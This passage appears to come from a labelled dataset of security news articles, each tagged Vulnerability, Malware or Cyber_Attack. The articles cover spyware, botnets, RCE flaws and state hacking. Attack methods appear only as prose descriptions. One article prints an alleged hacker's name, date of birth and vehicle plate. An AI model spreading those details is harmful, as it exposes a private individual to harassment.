""The consumer version of Google+ currently has low usage and engagement: 90 percent of Google+ user sessions are less than five seconds,"" Google said.
In response, the company has decided to shut down Google+ for consumers by the end of August 2019. However, Google+ will continue as a product for Enterprise users.
Google Introduces New Privacy Controls Over Third-Party App Permissions
As part of its ""Project Strobe,"" Google engineers also reviewed third-party developer access to Google account and Android device data; and has accordingly now introduced some new privacy controls.
When a third-party app prompts users for access to their Google account data, clicking ""Allow"" button approves all requested permissions at once, leaving an opportunity for malicious apps to trick users into giving away powerful permissions.
But now Google has updated its Account Permissions system that asks for each requested permission individually rather than all at once, giving users more control over what type of account data they choose to share with each app.
Since APIs can also allow developers to access users' extremely sensitive data, like that of Gmail account, Google has limited access to Gmail API only for apps that directly enhance email functionality—such as email clients, email backup services and productivity services.
Google shares fell over 2 percent to $1134.23 after the data breach reports.
",Vulnerability
'Exodus' Surveillance Malware Found Targeting Apple iOS Users,https://thehackernews.com/2019/04/exodus-ios-malware.html,"Cybersecurity researchers have discovered an iOS version of the powerful mobile phone surveillance app that was initially targeting Android devices through apps on the official Google Play Store.
Dubbed Exodus, as the malware is called, the iOS version of the spyware was discovered by security researchers at LookOut during their analysis of its Android samples they had found last year.
Unlike its Android variant, the iOS version of Exodus has been distributed outside of the official App Store, primarily through phishing websites that imitate Italian and Turkmenistani mobile carriers.
Since Apple restricts direct installation of apps outside of its official app store, the iOS version of Exodus is abusing the Apple Developer Enterprise program, which allows enterprises to distribute their own in-house apps directly to their employees without needing to use the iOS App Store.
""Each of the phishing sites contained links to a distribution manifest, which contained metadata such as the application name, version, icon, and a URL for the IPA file,"" the researchers say in a blog post.
""All these packages used provisioning profiles with distribution certificates associated with the company Connexxa S.R.L.""
Though the iOS variant is less sophisticated than its Android counterpart, the spyware can still be able to exfiltrate information from targeted iPhone devices including, contacts, audio recordings, photos, videos, GPS location, and device information.
The stolen data is then transmitted via HTTP PUT requests to an endpoint on the attackers controlled command and control server, which is the same CnC infrastructure as the Android version and uses similar communications protocols.
Several technical details indicated that Exodus was ""likely the product of a well-funded development effort"" and aimed to target the government or law-enforcement sectors.
""These included the use of certificate pinning and public key encryption for C2 communications, geo-restrictions imposed by the C2 when delivering the second stage, and the comprehensive and well-implemented suite of surveillance features,"" the researchers say.
Developed by Italy-based company called Connexxa S.R.L., Exodus came to light late last month when white hat hackers from Security Without Borders discovered nearly 25 different apps disguised as service applications on Google Play Store, which the tech giant removed after being notified.
Under development for at least five years, Exodus for Android usually consists of three distinct stages. First, there is a small dropper that collected basic identifying information, like the IMEI and phone number, about the targeted device.
The second stage consists of multiple binary packages that deploy a well-implemented suite of surveillance functionalities.
Finally, the third stage uses the infamous DirtyCOW exploit (CVE-2016-5195) to gain root control over the infected phones. Once successfully installed, Exodus can carry out an extensive amount of surveillance.
The Android variant is also designed to keep running on the infected device even when the screen is switched off.
While the Android version of Exodus had potentially infected ""several hundreds if not a thousand or more"" devices, it's not clear how many iPhones were infected by the iOS Exodus variant.
After being notified of the spyware by the Lookout researchers, Apple revoked the enterprise certificate, preventing malicious apps from being installed on new iPhones and run on infected devices.
This is the second instance in the past year when an Italian software company has been caught distributing spyware. Earlier last year, another undisclosed Italian firm was found distributing ""Skygofree,"" a dangerous Android spying tool that gives hackers full control of infected devices remotely.
",Malware
"Real Identity of Hacker Who Sold LinkedIn, Dropbox Databases Revealed",https://thehackernews.com/2018/11/tessa88-russian-hacker.html,"The real identity of Tessa88—the notorious hacker tied to several high-profile cyber attacks including the LinkedIn, DropBox and MySpace mega breaches—has been revealed as Maksim Vladimirovich Donakov (Максим Владимирович Донаков), a resident of Penza, Russian Federation.
In early 2016, a hacker with pseudonym Tessa88 emerged online offering stolen databases from some of the biggest social media websites in the world, including LinkedIn, MySpace, VKontakte (vk.com), Dropbox, Rambler, and Twitter, for sale in various underground hacking forums.
The stolen data, taken years ago from several social media sites, included more than half a billion username and password combinations, which were then used in phishing, account takeover, and other cyber attacks.
Though Tessa88's profile was active for a few months between February and May 2016, the OPSEC analysis revealed that the same person was involved in various cybercriminal activities since as early as 2012 under different aliases including ""Paranoy777,"" ""tarakan72511,"" ""stervasgoa,"" ""janer93"" and ""Daykalif.""
Unmasking ""Tessa88""
Researchers with US-based threat intelligence firm Recorded Future's Insikt Group used a combination of their own data, dark web activity, multiple chats and email accounts associated with Tessa88 to find a connection between his other online aliases, and collected information from publicly available sources to unveil his true identity.
Tarakan72511 → Tessa88 → Donakov
Researchers identified an online account ""tarakan72511"" on Imgur, a popular online image sharing service, who posted screenshots of discussions regarding the Yahoo and Equifax breaches. On the same account Tarakan72511 also posted his real picture titled ""tessa88"" in 2017, which links Donakov with tarakan72511 and tessa88.
Tessa88 → Donakov with Guy Fawkes mask
Another member of an underground forum, TraX, shared a photo of Tessa88, showing a man on the car roof with his face hidden behind Guy Fawkes mask, whose body type and hairstyle resemble with the picture of Tessa88 posted by tarakan72511.
Tarakan72511 → Russian Car with Guy Fawkes mask → Tessa88
Researchers also identified a YouTube account with a similar username—Tarakan72511 Donakov—who posted a video showing someone feeding stray dogs. The video also revealed a style Guy Fawkes mask (same as worn in the picture posted by TraX) in the boot of a Mitsubishi Lancer car with the registration number K652BO 58.
All Evidences Leads to Maksim Vladimirovich Donakov
After exploring several confidential sources, Penza records, and Russian crime database, researchers find Tessa88 as Maksim Vladimirovich Donakov (date of birth: 02/07/1989), whose persona matches with the YouTube username 'Donakov,' Mitsubishi Lancer and person revealed in Imgur picture.
Maksim Vladimirovich Donakov committed several crimes in Russia, including a car accident while driving a Mitsubishi Lancer in 2017. He also served jail time after committing another crime in 2014.
After the comprehensive investigation, Recorded Future, with a ""high degree of confidence, concluded that Donakov is the man behind the sale of the extensive databases, including 32 million Twitter accounts, 360 million Myspace credentials, and 500 million Yahoo accounts.
It is also believed that Donakov have sold data stolen from VKontakte (vk.com), Mobango, Badoo, QIP, and Rambler on various underground forums.
At the time of a series of so-called 'mega breaches' in 2016, another online alias that came up was Peace_of_Mind — a separate hacker who was seen selling 117 Million LinkedIn emails and passwords and 200 million Yahoo accounts in 2016 on the currently defunct TheRealDeal Market.
According to Recorded Future, Tessa88 and Peace_of_Mind made an agreement in May 2016 on sharing some of the stolen databases in a ""likely attempt to expedite monetizing the massive amount of data between the two.""
The LinkedIn breach resulted in the arrest of Russian national Yevgeniy Nikulin (Евгений Никулин) in October 2016 by the FBI in the Czech Republic, who was later extradited to the United States. However, until today, no clear evidence links Nikulin to Peace_of_Mind.
It should be noted that neither Tessa88 nor Peace_of_Mind was the actual hacker who breached the aforementioned companies. Both were involved in the selling of the already stolen databases, but not in performing the actual hacks, though the exact methods used to steal the databases are also unknown.
Recorded Future hopes that the upcoming criminal case of Nikulin, who is now also a person of ""great interest"" in the US probe of Russia's meddling in the US presidential election, will shed some light on the gaps in the story.
",Cyber_Attack
New OpenSMTPD RCE Flaw Affects Linux and OpenBSD Email Servers,https://thehackernews.com/2020/02/opensmtpd-email-vulnerability.html,"OpenSMTPD has been found vulnerable to yet another critical vulnerability that could allow remote attackers to take complete control over email servers running BSD or Linux operating systems.
OpenSMTPD, also known as OpenBSD SMTP Server, is an open-source implementation of the Simple Mail Transfer Protocol (SMTP) to deliver messages on a local machine or to relay them to other SMTP servers.
It was initially developed as part of the OpenBSD project but now comes pre-installed on many UNIX-based systems.
Discovered by experts at Qualys Research Labs, who also reported a similar RCE flaw in the email server application last month, the latest out-of-bounds read issue, tracked as CVE-2020-8794, resides in a component of the OpenSMTPD's client-side code that was introduced nearly 5 years ago.
Just like the previous issue, which attackers started exploiting in the wild just a day after its public disclosure, the new OpenSMTPD flaw could also let remote hackers execute arbitrary commands on the vulnerable servers with privileges of either root or any non-root user.
As described in the screenshot of the advisory, the flaw can be exploited by a local or remote attacker in two ways by sending specially crafted SMTP messages, one works in the default configuration, and the second leverages email bounce mechanism.
""We developed a simple exploit for this vulnerability and successfully tested it against OpenBSD 6.6 (the current release), OpenBSD 5.9 (the first vulnerable release), Debian 10 (stable), Debian 11 (testing), and Fedora 31,"" the advisory says.
""We tested our exploit against the recent changes in OpenSMTPD 6.6.3p1, and our results are: if the ""mbox"" method is used for local delivery (the default in OpenBSD -current), then arbitrary command execution as root is still possible; otherwise (if the ""maildir"" method is used, for example), arbitrary command execution as any non-root user is possible.""
However, the Qualys team has decided to withhold the exploitation details and exploit code until 26th February, giving vulnerable OpenSMTPD's users a two-day window to patch their systems.
If you're also running BSD or Linux servers with a vulnerable version of the OpenSMTPD, you're advised to download OpenSMTPD 6.6.4p1 and apply the patch as soon as possible.
",Vulnerability
Operator of VirusTotal Like Malware-Scanning Service Jailed for 14 Years,https://thehackernews.com/2018/09/scan4you-malware-scanner.html,"A Latvian hacker behind the development and operation of counter antivirus service ""Scan4You"" has finally been sentenced to 14 years in prison.
37-year-old Ruslans Bondars, described as a Latvian ""non-citizen"" or ""citizen of the former USSR who had been residing in Riga, Latvia,"" was found guilty on May 16 in federal court in Alexandria, during which a co-conspirator revealed he had worked with Russian law enforcement.
Bondars created and ran Scan4you—a VirusTotal like online multi-engine antivirus scanning service that allowed hackers to run their code by several popular antiviruses to determine if their computer virus or malware would be flagged during routine security scans before launching them into a real-world malware campaign.
While legal scanning services share data about uploaded files with the antivirus firms, Scan4you instead informed its users that they could ""upload files anonymously and promised not to share information about the uploaded files with the antivirus community.""
Bondars was one of the two hackers found to have been running Scan4you from 2009 to 2016 and helping other malware authors test and improve the malware they then ""used to inflict hundreds of millions of dollars in losses on American companies and consumers.""
Bondars' partner Jurijs Martisevs, who was also arrested while on a trip to Latvia and extradited to the United States, pleaded guilty to similar charges back in March this year.
According to the Justice Department press release, Scan4you customers used the service to steal millions of payment cards from retail stores across the world, including the United States, which led to some $20.5 billion in losses.
For instance, one Scan4you customer used the service to test malware that was subsequently used to steal approximately 40 million credit and debit card numbers, and other personal information from a US retail store, causing $292 million in losses.
Another customer used Scan4you to assist the development of ""Citadel""—a widely used malware strain that infected over 11 million computers worldwide, including in the United States and resulted in over $500 million in fraud-related losses.
""Ruslans Bondars helped malware developers attack American businesses,"" said Assistant Attorney General Benczkowski. ""The Department of Justice and its law enforcement partners make no distinction between service providers like Scan4You and the hackers they assist: we will hold them accountable for all of the significant harm they cause and work tirelessly to bring them to justice, wherever they may be located.""
Bondars was convicted of three counts, including conspiracy to violate the Computer Fraud and Abuse Act, conspiracy to commit wire fraud, and computer intrusion with intent to cause damage and was sentenced to 168 months in prison on Friday.
Although US court never charged Bondars with direct involvement in any hacking, court documents show he used malware to rob online users and trick them into buying antivirus services they did not need.
Moreover, prosecutors also say Scan4You was an ""innovation"" in malware that has inspired many copycats, which resulted in such services being readily available on the Internet.
",Malware
FBI issues alert over two new malware linked to Hidden Cobra hackers,https://thehackernews.com/2018/05/north-korean-hacker-hidden-cobra.html,"The US-CERT has released a joint technical alert from the DHS and the FBI, warning about two newly identified malware being used by the prolific North Korean APT hacking group known as Hidden Cobra.
Hidden Cobra, often known as Lazarus Group and Guardians of Peace, is believed to be backed by the North Korean government and known to launch attacks against media organizations, aerospace, financial and critical infrastructure sectors across the world.
The group was even associated with the WannaCry ransomware menace that last year shut down hospitals and businesses worldwide. It is reportedly also linked to the 2014 Sony Pictures hack, as well as the SWIFT Banking attack in 2016.
Now, the Department of Homeland Security (DHS) and the FBI have uncovered two new pieces of malware that Hidden Cobra has been using since at least 2009 to target companies working in the media, aerospace, financial, and critical infrastructure sectors across the world.
The malware Hidden Cobra is using are—Remote Access Trojan (RAT) known as Joanap and Server Message Block (SMB) worm called Brambul. Let's get into the details of both the malware one by one.
Joanap—A Remote Access Trojan
According to the US-CERT alert, ""fully functional RAT"" Joanap is a two-stage malware that establishes peer-to-peer communications and manages botnets designed to enable other malicious operations.
The malware typically infects a system as a file delivered by other malware, which users unknowingly download either when they visit websites compromised by the Hidden Cobra actors, or when they open malicious email attachments.
Joanap receives commands from a remote command and control server controlled by the Hidden Cobra actors, giving them the ability to steal data, install and run more malware, and initialize proxy communications on a compromised Windows device.
Other functionalities of Joanap include file management, process management, creation and deletion of directories, botnet management, and node management.
During analysis of the Joanap infrastructure, the U.S. government has found the malware on 87 compromised network nodes in 17 countries including Brazil, China, Spain, Taiwan, Sweden, India, and Iran.
Brambul—An SMB Worm
Brambul is a brute-force authentication worm that like the devastating WannaCry ransomware, abuses the Server Message Block (SMB) protocol in order to spread itself to other systems.
The malicious Windows 32-bit SMB worm functions as a service dynamic link library file or a portable executable file often dropped and installed onto victims' networks by dropper malware.
""When executed, the malware attempts to establish contact with victim systems and IP addresses on victims' local subnets,"" the alert notes.
""If successful, the application attempts to gain unauthorized access via the SMB protocol (ports 139 and 445) by launching brute-force password attacks using a list of embedded passwords. Additionally, the malware generates random IP addresses for further attacks.""
Once Brambul gains unauthorized access to the infected system, the malware communicates information about victim's systems to the Hidden Cobra hackers using email. The information includes the IP address and hostname—as well as the username and password—of each victim's system.
The hackers can then use this stolen information to remotely access the compromised system via the SMB protocol. The actors can even generate and execute what analysts call a ""suicide script.""
DHS and FBI have also provided downloadable lists of IP addresses with which the Hidden Cobra malware communicates and other IOCs, to help you block them and enable network defenses to reduce exposure to any malicious cyber activity by the North Korean government.
DHS also recommended users and administrators to use best practices as preventive measures to protect their computer networks, like keeping their software and system up to date, running Antivirus software, turning off SMB, forbidding unknown executables and software applications.
Last year, the DHS and the FBI published an alert describing Hidden Cobra malware, called Delta Charlie—a DDoS tool which they believed North Korea uses to launch distributed denial-of-service (DDoS) attacks against its targets.
Other malware linked to Hidden Cobra in the past include Destover, Wild Positron or Duuzer, and Hangman with sophisticated capabilities, like DDoS botnets, keyloggers, remote access tools (RATs), and wiper malware.
",Cyber_Attack
Critical Code Execution Flaw Found in LIVE555 Streaming Library,https://thehackernews.com/2018/10/critical-flaw-found-in-streaming.html,"Security researchers have discovered a serious code execution vulnerability in the LIVE555 streaming media library—which is being used by popular media players, along with a number of embedded devices capable of streaming media.
LIVE555 streaming media, developed and maintained by Live Networks, is a set of C++ libraries companies and application developers use to stream multimedia over open standard protocols like RTP/RTCP, RTSP or SIP.
The LIVE555 streaming media libraries support streaming, receiving, and processing of various video formats such as MPEG, H.265, H.264, H.263+, VP8, DV, and JPEG video, and several audio codecs such as MPEG, AAC, AMR, AC-3, and Vorbis.
UPDATE: LIVE555 streaming media library supports both server and client, and is internally being used by many well-known media software such as VLC and MPlayer, security researchers at Talos mentioned in the advisory.
Though researchers didn't specify if the vulnerable component (a server-side library) is being used by the popular VLC player, team at VLC today contacted THN and clarified that their media player application is using LIVE555 streaming media at the client-side only.
The code execution vulnerability, tracked as CVE-2018-4013 and discovered by researcher Lilith Wyatt of Cisco Talos Intelligence Group, resides in the HTTP packet-parsing functionality of the LIVE555 RTSP, which parses HTTP headers for tunneling RTSP over HTTP.
""A specially crafted packet can cause a stack-based buffer overflow, resulting in code execution,"" Cisco Talos' security advisory says. ""An attacker can send a packet to trigger this vulnerability.""
To exploit this vulnerability, all an attacker needs to do is create and send ""a packet containing multiple 'Accept:' or 'x-sessioncookie' strings"" to the vulnerable application, which will trigger a stack buffer overflow in the 'lookForHeader' function, leading to arbitrary code execution.
Cisco Talos team confirmed the vulnerability in Live Networks LIVE555 Media Server version 0.92, but the team believes the security issue may also be present in the earlier version of the product.
Cisco Talos responsibly reported the vulnerability to Live Networks on October 10 and publicly disclosed the security issue on October 18 after the vendor released security patches on October 17.
",Vulnerability
US and Global Allies Accuse China of Massive Microsoft Exchange Attack,https://thehackernews.com/2021/07/us-and-global-allies-accuse-china-of.html,"The U.S. government and its key allies, including the European Union, the U.K., and NATO, formally attributed the massive cyberattack against Microsoft Exchange email servers to state-sponsored hacking crews working affiliated with the People's Republic of China's Ministry of State Security (MSS).
In a statement issued by the White House on Monday, the administration said, ""with a high degree of confidence that malicious cyber actors affiliated with PRC's MSS conducted cyber-espionage operations utilizing the zero-day vulnerabilities in Microsoft Exchange Server disclosed in early March 2021. The U.K. government accused Beijing of a ""pervasive pattern of hacking"" and ""systemic cyber sabotage.""
The sweeping espionage campaign exploited four previously undiscovered vulnerabilities in Microsoft Exchange software and is believed to have hit at least 30,000 organizations in the U.S. and hundreds of thousands more worldwide. Microsoft identified the group behind the hack as a skilled government-backed actor operating out of China named Hafnium.
Calling it ""the most significant and widespread cyber intrusion against the U.K. and allies,"" the National Cyber Security Centre (NCSC) said the attack was highly likely to enable ""acquiring personally identifiable information and intellectual property.""
In addition, the MSS was also outed as the party behind a series of malicious cyber activities tracked under the monikers ""APT40"" and ""APT31,"" with the U.K. attributing the groups for targeting maritime industries and naval defence contractors in the U.S. and Europe, and as well as for executing the attack on the Finnish parliament in 2020.
Also, on Monday, the U.S. Federal Bureau of Investigation (FBI), National Security Agency (NSA), and Cybersecurity and Infrastructure Security Agency (CISA) released a joint advisory listing over 50 tactics, techniques, and procedures employed by APT40 and other Chinese state-sponsored cyber actors.
""It has been a few months since attackers exploited the Hafnium related bugs in Exchange to deploy ransomware, like DearCry and Black Kingdom,"" Mark Loman, director of engineering at Sophos, said in an emailed statement. ""In general, to protect themselves, ransomware operators typically operate from the dark web, or via one or more compromised servers hosted in countries other than the physical location of the attackers. This makes attack attribution hard, but not impossible.""
US Indicts Members of APT 40 Chinese Hacking Group
In a related development, the U.S. Department of Justice (DoJ) pressed criminal charges against four MSS hackers belonging to the APT40 group concerning a multiyear campaign targeting foreign governments and entities in maritime, aviation, defense, education, and healthcare sectors in the least a dozen countries to facilitate the theft of trade secrets, intellectual property, and high-value information.
Separately, the NCSC also announced that a group known as ""APT10"" acted on behalf of the MSS to carry out a sustained cyber campaign focused on large-scale service providers with the goal of seeking to gain access to commercial secrets and intellectual property data in Europe, Asia, and the U.S.
""APT 10 has an enduring relationship with the Chinese Ministry of State Security, and operates to meet Chinese State requirements,"" the intelligence agency said.
In a press statement, the European Union urged Chinese authorities to take action against malicious cyber activities undertaken from its territory, stating the Microsoft Exchange server hacks resulted in security risks and significant economic loss for government institutions and private companies.
The Chinese government has repeatedly denied claims of state-sponsored intrusions. A spokesperson for the Chinese Embassy in Washington, according to the Associated Press, painted China as ""a severe victim of the U.S. cyber theft, eavesdropping, and surveillance,"" noting that the ""U.S. has repeatedly made groundless attacks and malicious smear against China on cybersecurity.""
""The PRC has fostered an intelligence enterprise that includes contract hackers who also conduct unsanctioned cyber operations worldwide, including for their own personal profit,"" the White House said, adding ""hackers with a history of working for the PRC Ministry of State Security (MSS) have engaged in ransomware attacks, cyber enabled extortion, cryptojacking, and rank theft from victims around the world, all for financial gain.""
Update: Speaking at a press conference, Zhao Lijian, a spokesperson for the Chinese Ministry of Foreign Affairs, rejected accusations that Beijing was behind the global cyber hacking campaign targeting Microsoft Exchange servers and accused the U.S. of being the world's largest source of attacks in cyberspace.
""China firmly opposes and combats all forms of cyber attacks. It will never encourage, support or condone cyber attacks. This position has been consistent and clear,"" Lijian said. ""Given the virtual nature of cyberspace and the fact that there are all kinds of online actors who are difficult to trace, it's important to have enough evidence when investigating and identifying cyber-related incidents. It requires extra prudence when linking cyber attacks with the government of any country. The so-called technical details released by the U.S. side do not constitute a complete chain of evidence.""
",Cyber_Attack
Android malware - Works on remote commands form encrypted blog,https://thehackernews.com/2011/10/android-malware-works-on-remote.html,"Android malware - Works on remote commands form encrypted blog
Researchers from Trend Micro have spotted a piece of malicious software for Android. This is the first known Android malware that reads blog posts and interprets these as commands. It can also download and install additional applications, therefore further compromising the affected device.
Trend Micro calls the malware ""ANDROIDOS_ANSERVER.A."" If the application is installed, it asks for a variety of permissions. If those are granted, it can then make calls, read log files, write and receive SMSes and access the Internet and network settings, among other functions. This backdoor may be unknowingly downloaded by a user while visiting malicious websites. It may be manually installed by a user.
""This is a blog site with encrypted content, which based on our research, is the first time Android malware implemented this kind of technique to communicate,"" wrote Karl Dominguez, a Trend Micro threat response engineer.
We recommend that users should be cautious when downloading Android applications from third party application stores due to the number of rogue applications that have been found.
",Malware
"Java-Bot, a Cross-platform malware launching DDoS attacks from infected computers",https://thehackernews.com/2014/01/java-bot-cross-platform-malware.html,"These days botnets are all over the news. In simple terms, a botnet is a group of computers networked together, running a piece of malicious software that allows them to be controlled by a remote attacker.
A major target for most of the malware is still Windows, but the growing market of Mac OS X, Linux and Smartphones, is also giving a solid reason to cyber criminals to focus.
Recently, Kaspersky Lab has detected another cross-platform Java-Bot, capable of infecting computers running Windows, Mac OS X, and Linux that has Java Runtime Environment installed.
Last year, Zoltan Balazs - CTO at MRG Effitas submitted the samples of malicious Java application for analysis to Kaspersky Lab and they identified it as HEUR:Backdoor.Java.Agent.a.
According to researchers, to compromise computers, Java-Bot is exploiting a previously known critical Java vulnerability CVE-2013-2465 that was patched in last June. The vulnerability persists in Java 7 u21 and earlier versions.
CVE-2013-2465 description says:
An unspecified vulnerability in the Java Runtime Environment (JRE) component in Oracle Java SE 7 Update 21 and earlier, 6 Update 45 and earlier, and 5.0 Update 45 and earlier, and OpenJDK 7, allows remote attackers to affect confidentiality, integrity, and availability via unknown vectors related to 2D.
Once the bot has infected a computer, for automatic initialization the malware copies itself into the home directory, and registers itself with system startup programs. The Malware is designed to launch distributed denial-of-service (DDOS) attacks from infected computers.
It uses the following methods to start it based on the target operating system:
For Windows – HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
Mac OS – the standard Mac OS service launch is used
For Linux – /etc/init.d/
The malware authors used Zelix Klassmaster Obfuscator (encryption) to make the analysis more difficult. It creates a separate key for the classes developed due to which analysis of all classes has to be done to get the decryption keys.
The botnet executable contains an encrypted configuration file for the Mac OS 'launchd service'. It also encrypts internal working methodology of malware.
The malware uses PricBot an open framework for implementing communication via IRC. Zombie computers, then report to an Internet relay chat (IRC) channel that acts as a Command-and-control server.
The Botnet supports HTTP, UDP protocols for flooding (DDoS attack) a target whose details i.e. Address, port number, attack duration, number of threads to be used are received from the IRC channel.
Users should update their Java software to the latest release of Java 7 update 51 of 14 January 2014, can be found on Oracle's Java website. The next scheduled security update for Java is on 14 April 2014.
",Malware
15-Year-Old JasBug Vulnerability Affects All Versions of Microsoft Windows,https://thehackernews.com/2015/02/jasbug-windows-vulnerability.html,"Microsoft just issued a critical patch to fix a 15-year-old vulnerability that could be exploited by hackers to remotely hijack users' PCs running all supported versions of Windows operating system.
The critical vulnerability — named ""JASBUG"" by the researcher who reported the flaw — is due to a flaw in the fundamental design of Windows that took Microsoft more than 12 months to release a fix. However, the flaw is still unpatched in Windows Server 2003, leaving the version wide open to the hackers for the remaining five months.
HACKERS CAN EASILY HIJACK YOUR WINDOWS MACHINE
The vulnerability (CVE-2015-0008) could allow an attacker to easily hijack a domain-configured Windows system if it is connected to a malicious network – wirelessly or wired, giving attacker consent to do various tasks including, to go forth and install programs; delete, alter or peruse users' data; or to create new accounts with full user rights.
However, Jasbug vulnerability do not affects home users because they are not usually domain-configured, but the bug is a massive discomfort for IT pros who typically connect to business, corporate, or government networks using the Active Directory service.
The vulnerability, classified as MS15-011, allows hackers who are in a position to monitor traffic passing between the user and the Active Directory network to launch a Man-in-the-Middle (MitM) attack in order to execute malicious code on vulnerable systems.
AFFECTED WINDOWS VERSIONS
Windows Vista
Windows 7
Windows 8
Windows RT
Windows 8.1
Windows RT 8.1
Windows Server 2003
Windows Server 2008
Windows Server 2008 R2
Windows Server 2012
Windows Server 2012 R2
HOW JASBUG WORKS
Microsoft, on its blog post, provided the following example of how a malicious hacker could exploit the Jasbug vulnerability on a machine connected over open Wi-Fi at a coffee shop:
This is an example of a 'coffee shop' attack scenario, where an attacker would attempt to make changes to a shared network switch in a public place and can direct the client traffic an attacker-controlled system.
In this scenario, the attacker has observed traffic across the switch and found that a specific machine is attempting to download a file located at the UNC path: \\10.0.0.100\Share\Login.bat .
On the attacker machine, a share is set up that exactly matches the UNC path of the file requested by the victim: \\*\Share\Login.bat.
The attacker will have crafted the contents of Login.bat to execute arbitrary, malicious code on the target system. Depending on the service requesting Login.bat, this could be executed as the local user or as the SYSTEM account on the victim's machine.
The attacker then modifies the ARP table in the local switch to ensure that traffic intended for the target server 10.0.0.100 is now routed through to the attacker's machine.
When the victim's machine next requests the file, the attacker's machine will return the malicious version of Login.bat. This scenario also illustrates that this attack cannot be used broadly across the internet – an attacker need to target a specific system or group of systems that request files with this unique UNC.
MORE PATCHES TO APPLY
In addition to Jasbug vulnerability, Microsoft released two other security updates that are rated critical, both with the potential to allow remote code execution on a vulnerable machine.
MS15-009: The update patches 41 reported vulnerabilities, one publicly disclosed flaw and 40 privately reported vulnerabilities, in Internet Explorer affecting all versions of the browser from version 6 and above on all operating systems.
MS15-010: This security update patches six vulnerabilities, one publicly disclosed flaw and remaining reported privately, in Windows 7 and above, and server software after Windows Server 2008 R2 and later editions. The vulnerabilities are due to the way a Windows kernel-level component handles TrueType fonts.
The remaining six patches in Microsoft's February Patch update are all rated ""important"" by Redmond. Two vulnerabilities in Microsoft Office could allow RCE and security feature bypass, and bugs in Windows that could allow elevation of privilege, security feature bypass and information disclosure. Also a vulnerability in Virtual Machine Manager (VMM) could give an attacker elevated privileges.
",Vulnerability
CA security finds Android Trojan which records phone calls,https://thehackernews.com/2011/08/ca-security-finds-android-trojan-which.html,"CA security finds Android Trojan which records phone calls
A new Android Trojan is capable of recording phone conversations, according to a CA security researcher. The trojan is triggered when the Android device places or receives a phone call. It saves the audio file and related information to the phone's microSD card, and includes a configuration file with information on a remote server and settings used by the trojan.
The malware also ""drops a 'configuration' file that contains key information about the remote server and the parameters,"" CA security researcher Dinesh Venkatesan writes in a blog, perhaps suggesting that the recorded calls can be uploaded to a server maintained by an attacker.
According to the post, the trojan presents itself as an ""Android System Message"" that requires users to press an ""Install"" button for it to insert itself in the phone. Once installed, the trojan records all incoming and outgoing calls to a directory on the microSD card as .amr files, as well as information about the call, including its duration, in a text file.
Venkatesan tested the Trojan in ""a controlled environment with two mobile emulators running along with simulated Internet services,"" and posted screenshots with the results. It appears the Trojan can only be installed if the Android device owner clicks the ""install"" button on a message that looks strikingly similar to the installation screens of legitimate applications.
""As it is already widely acknowledged that this year is the year of mobile malware, we advice the smartphone users to be more logical and exercise the basic security principles while surfing and installing any applications,"" Venkatesan writes.
",Malware
iPhone can be used as spy phone to get desktop Keystrokes,https://thehackernews.com/2011/10/iphone-can-be-used-as-spy-phone-to-get.html,"iPhone can be used as spy phone to get desktop Keystrokes
What if a hacker could log every key you typed on your PC by placing a cellphone nearby? US researchers have shown how this is possible using any smartphone available today.
At a conference in Chicago on Thursday, a group of computer researchers from Georgia Tech will report on another potential threat. The researchers have shown that the accelerometer and orientation sensor of a phone resting on a surface can be used to eavesdrop as a password is entered using a keyboard on the same surface. They were able to capture the words typed on the keyboard with as much as 80 percent accuracy.
Normally when security researchers describe spyware on smartphones, they mean malicious code that can be used to snoop on calls, or to steal the data held on mobile phones.In this case, however, researchers have described how they have put software on smartphones to spy on activity outside the phone itself - specifically to track what a user might be doing on a regular desktop keyboard nearby.
The typing detection works by ""using a smartphone accelerometer – the internal device that detects when and how the phone is tilted – to sense keyboard vibrations as you type to decipher complete sentences with up to 80% accuracy,"" according to the Institute.
""We first tried our experiments with an iPhone 3GS, and the results were difficult to read,"" said Patrick Traynor of Georgia Tech. ""But then we tried an iPhone 4, which has an added gyroscope to clean up the accelerometer noise, and the results were much better. We believe that most smartphones made in the last two years are sophisticated enough to do this attack.""
As phone technology improves, attacks via the accelerometer could become more feasible. The researchers' initial experiments used Apple's iPhone 3GS, but the phone's accelerometer lacked the necessary sensitivity. The researchers then moved to the iPhone 4, which uses a gyroscope to remove noise from the accelerometer data, and had much greater success.
""The way we see this attack working is that you, the phone's owner, would request or be asked to download an innocuous-looking application, which doesn't ask you for the use of any suspicious phone sensors,"" said Henry Carter, one of the study's co-authors . ""Then the keyboarddetection malware is turned on, and the next time you place your phone next to the keyboard , it starts listening.""
",Vulnerability
Hacker Reveals Easiest Way to Hijack Privileged Windows User Session Without Password,https://thehackernews.com/2017/03/hack-windows-user-account.html,"You may be aware of the fact that a local Windows user with system rights and permissions can reset the password for other users, but did you know that a local user can also hijack other users' session, including domain admin/system user, without knowing their passwords?
Alexander Korznikov, an Israeli security researcher, has recently demonstrated that a local privileged user can even hijack the session of any logged-in Windows user who has higher privileges without knowing that user's password, using built-in command line tools.
This trick works on almost all versions of Windows operating system and does not require any special privileges. Korznikov is himself unable to figure out if it is a Windows feature or a security flaw.
The issue discovered by Korznikov is not entirely new, as a French security researcher, namely Benjamin Delpy, detailed a similar user session hijacking technique on his blog some six years ago.
Korznikov calls the attack a ""privilege escalation and session hijacking,"" which could allow an attacker to hijack high-privileged users' session and gain unauthorized access to applications and other sensitive data.
For successful exploitation, an attacker requires physical access to the targeted machine, but using Remote Desktop Protocol (RDP) session on a hacked machine; the attack can be performed remotely as well.
Video Demonstrations and PoC Exploit Released!
Korznikov has also provided a few video demonstrations of a successful session hijacking (using Task manager, service creation, as well as command line), along with Proof-of-Concept (PoC) exploit.
Korznikov successfully tested the flaw on the newest Windows 10, Windows 7, Windows Server 2008 and Windows Server 2012 R2, though another researcher confirmed on Twitter that the flaw works on every Windows version, even if the workstation is locked.
While Microsoft does not deem it to be a security vulnerability and some experts argued that a Windows user with administrative permissions can do anything, Korznikov explained a simple attack scenario to explain how a malicious insider can easily misuse this flaw:
""Some bank employee have access to the billing system and its credentials to log in. One day, he comes to work, logging into the billing system and start to work. At lunchtime, he locks his workstation and goes out for lunch. Meanwhile, the system administrator gets to can use this exploit to access employee's workstation.""
""According to the bank's policy, administrator's account should not have access to the billing system, but with a couple of built-in commands in windows, this system administrator will hijack employee's desktop which he left locked. From now, a sysadmin can perform malicious actions in billing system as billing employee account.""
